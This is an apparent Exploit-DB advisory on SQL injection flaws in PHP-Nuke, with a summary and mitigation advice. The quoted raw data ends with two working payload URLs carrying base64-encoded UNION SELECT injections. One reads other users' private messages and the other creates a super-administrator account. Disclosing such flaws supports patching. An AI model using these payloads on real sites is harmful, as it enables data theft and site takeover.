PHP-Nuke Multiple SQL Injection Vulnerabilities

vendor:

PHP-Nuke

by:

Unknown

CVSS

CRITICAL

SQL Injection

CWE

Product Name: PHP-Nuke

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: NO

Related CWE: Not available

CPE: a:phpnuke:phpnuke

Metasploit:

Other Scripts:

Platforms Tested:

Unknown

PHP-Nuke Multiple SQL Injection Vulnerabilities

The PHP-Nuke application is vulnerable to multiple SQL injection vulnerabilities. These vulnerabilities occur due to a lack of proper sanitization of user input. An attacker can exploit these vulnerabilities to modify database queries and potentially gain unauthorized access to sensitive information. Two specific examples of the exploits are provided in the report.

Mitigation:

It is recommended to apply patches or updates provided by the PHP-Nuke project to address these vulnerabilities. Additionally, input validation and sanitization should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/10135/info 

Reportedly PHP-Nuke is prone to multiple SQL injection vulnerabilities. These issues are due to a failure of the application to properly sanitize user supplied input.

As a result of these issues an attacker could modify the logic and structure of database queries. Other attacks may also be possible, such as gaining access to sensitive information.

To read arbitrary users private messages:
http://www.example.com/nuke71/modules.php?name=Private_Messages&file=index&folder=inbox&user=eDpmb28nIFVOSU9OIFNFTEVDVCAyLG51bGwsMSwxLG51bGwvKjox

To create an arbitrary administrator account with username "waraxe2" and password "coolpass":
http://www.example.com/nuke71/admin.php?op=AddAuthor&add_aid=waraxe2&add_name=God&add_pwd=coolpass&add_email=foo@bar.com&add_radminsuper=1&admin=eCcgVU5JT04gU0VMRUNUIDEvKjox